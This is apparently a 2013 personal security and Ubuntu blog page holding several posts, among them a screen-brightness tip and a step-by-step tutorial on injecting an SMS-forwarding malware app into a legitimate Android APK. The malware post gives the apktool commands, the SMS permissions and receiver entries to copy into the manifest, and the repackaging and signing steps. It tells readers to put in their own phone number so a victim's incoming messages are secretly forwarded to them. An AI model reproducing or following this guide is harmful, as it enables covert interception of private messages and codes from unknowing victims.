Information Security, Web, Networks and Systems

Sunday, September 8, 2013

Sniff Public Traffic with Wireshark Monitor Mode and BroadCom Wirelesscard in Ubuntu

In this post I'll show you how to sniff packets with Wireshark Monitor mode in Ubuntu. First of all you need to check what wireless driver you have installed in your computer. In my case in ubuntu 13.04, you can check your driver installation at Additional Drivers.

Thursday, September 5, 2013

Change Screen Brightness in Ubuntu Terminal

11:35 AM Posted by Deepal , , , , No comments
I had a problem in my HP pavilion G6 Laptop with brightness change. I could not change the brightness using my function keys. Though I could change brightness by the Brightness & Lock settings, lowest brightness level was too bright for me. So I used following method to reduce the brightness.

    sudo -s
    nano /sys/class/backlight/intel_backlight/brightness

(In my case it was intel_backlight. This may change from computer to computer.) Edit the value of the file. In my case, the value was about 4000. So I reduced it to 800 and saved. Then the brightness was reduces. You can reduce the brightness into any level by just editing this file.

If you want to reduce the brightness at every startup, include following command in /etc/rc/local file.( /etc/rc.local file is executed at the end of every startup. If you put a command there, you can run that command at every startup)

    echo 800 > /sys/class/backlight/intel_backlight/brightness

Restart your computer and you'll see your command is effective.

A little more fun :

I created a small shell script (.sh) to reduce my brightness to any amount at any time easily. But for this script I would have changed the brightness using the entire command given above. This shell script made it easy. I just needed to execute the shell script and pass brightness value as a command line parameter as follows.

./brightness 600

Here is my shell script:

    echo $1 > /sys/class/backlight/intel_backlight/brightness
    echo "[+] Brightness set to $1n"

Android Malware Injection into Original Apps

In this post I am going to describe how malicious apps can be injected into an original apps using UBUNTU. For this post I have created a small malicious app which intercepts incoming SMS and fowards to another person without victim  knowing when message receives. You need to have following files to do this:
APKtool (for WIndows, you may need to download a windows version of apktool here)
SignAPK.jar + keys
Malicious SMSHacker.apk app

You can download all these stuff with this link;

Here is a rough sketch of our process to do this..
Decompile the original android app (.apk) using apktool
Decompile the malicious android app (SMSHacker.apk) using apktool
Inject decompiled malicious app's files(Copy malicious files into) into decompiled original app
Inject permissions in the malicious apk file's AndroidManifest.xml into original file's AndroidManifest.xml
Recompile the infected original app using apktool
Sign the recompiled app using signapk.jar
Install recompiled-signed apk file into victim's device
Let's follow the listed steps;

Step 1:

    Download all files I have given in the above mediafire link. I have included all required files including sample SMSHacker app to test. And copy all files into a single directory.

Copy your apk file into which you need to inject SMSHacker into the same directory. You can keep your apk file in your own directory, but you need to mention the path to it explicitly in the following step.

Open a terminal and go to that directory. Run following command to decompile your original apk file(Android App). Lets say your original apk filename is myapp.apk;

./apktool d myapp.apk MyAppDec

In this above command 'd' switch means you are decompiling myapp.apk file. With 'MyAppDec', you mention include decompiled app in a directory named 'MyAppDec' in the same folder.

Step 2:

Now decompile your malicious file too (SMSHacker.apk);

./apktool d SMSHacker.apk SMSHackerDec

Then you'll see two directories called SMSHackerDec and MyAppDec in the same folder in which decompiled files are included.

Step 3:

If you browse into these folders, you'll note that there is a folder called smali in both the decompiled app folders. This smali folder includes all decompiled files from the apks. When you decompile an apk, they are decompiled into a file type called .smali. Now go into the folder which include all smali files of the malware (SMSHacker) with this command.

cd /SMSHackerDec/smali/com/sms/smshacker/

Then open SMSHacker.smali file in gedit.

gedit SMSHacker.smali

I created this malware and tested on emulators. So I have set the sms fowarding mobile number as '5554'. You can change it to your own one and let all receiving messages of victim be fowarded to your own number. So search for the string '5554' in the SMSHacker.smali file and replace it with your preferred number. (say your backup phone :D).

Now copy these malicious files into decompiled original app's files.

cd ../../../../../;
cp SMSHackerDec/smali/com/* -R MyAppDec/smali/com/;

Then you have injected files into the original folder. Now we need to inject required permissions from the SMSHacker's AndroidManifest.xml file into the original file's AndroidManifest.xml file.

Step 4:

Open SMSHacker's AndroidManifest.xml file in gedit.

gedit SMSHackerDec/AndroidManifest.xml

You'll see three lines in the file like these.

<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />

Actually we do not need the 3rd permission for this sake. So copy first two lines into the MyAppDec/AndroidManifest.xml file before <application> tag.

And also you might see few lines like followings inside the malicious file's AndroidManifest.xml

<receiver android:name="com.sms.smshacker.SMSHacker">
        <action android:name="android.provider.Telephony.SMS_RECEIVED" />

Copy this part into MyAppDec/AndroidManifest.xml within <application> tag and before  first <activity> tag.

Now save  MyAppDec/AndroidManifest.xml file and close gedit.

Now we have succesfully injected files and permissions. Now we can recompile the new app using apktool.

Step 5:

Go to the directory where apktool and other files exist and run apktool to recompile the app.

./apktool b -f MyAppDec myhackedapp.apk

This 'b' switch means build and '-f' switch means 'force'. This '-f' neglects any file changes in the apk file and compile it without any issues.

After running that command you'll see a new myhackedapp.apk file inside the same folder.

Step 6:

We need to sign that app using signapk.jar before installation. This signing task is important before installation since you cannot install an app on a device or an emulator without signing it.

Sign your apk file using following command.

java -jar signapk.jar testkey.x509.pem testkey.pk8 myhackedapp.apk myhackedapp-signed.apk

You'll see your signed apk file named myhackedapp-signed.apk.

Now we are done. We can install this apk file in any device and let victim execute the malicious code.

This SMSHacker.apk is actually an app with a Broadcast receiver. What it does is, when a message is received it gets invoked and executes the code inside its handler. I have included code to foward message to another phone inside the handler. We need to include <receiver> information inside the AndroidManifest.xml file to get this to work. That's why we injected <receiver> information from the malicious manifest file into the original manifest file. And also we require permissions to read an incoming messge and send a sms. So we injected permissions to read sms and send sms in original app's manifest. 

When installed, this would be visible as a normal app in victims device, and when victim runs the app for the first time receiver starts. After that if victim closes the original app the receiver continues listening for incoming sms.

I have included this in a module in the Android Exploitation Framework I am currently developing for a project. In that framework, one can use many types of payloads to inject to any original app.

Thanks for reading and if there are any issues, post a comment below.

Wednesday, September 4, 2013

Fix Issues in ATI Radeon Graphics - Ubuntu 13.10 and earlier

1:42 PM Posted by Deepal , , , No comments
If you are using radeon graphics or any other dedicated AMD graphics card with Intel Graphics in your laptop, you might have encountered a problem of overheating and lesser battary life. If you are using Ubuntu 13.04 or an earlier version, you can shut down AMD graphics card permanently and let Intel Graphics card work and solve these two problems. But if you are using Ubuntu 13.10 (on the day of this writing, latest ubuntu version is 13.10), you can install AMD Radeon drivers including Catalyst Control Center since Ubuntu 13.10 now supports ATI Hybrid Graphics.

Install and configure LAMP Server and PhpMyAdmin on Ubuntu

12:26 PM Posted by Deepal , , , , No comments
Hello all, As my first post in my Ubuntu blog I am going to describe how to install and configure Apache web server in ubuntu. Most tutorials found on internet either describes how to install Apache web server or how to install PHPmyadmin on ubuntu. In this tutorial I'll describe how to install Apache web server using LAMP (Linux version of WAMP as you may know), install PhpMyadmin and configure it to work in coperation with Apache and discuss some frequently asked questions on working with Apache on ubuntu.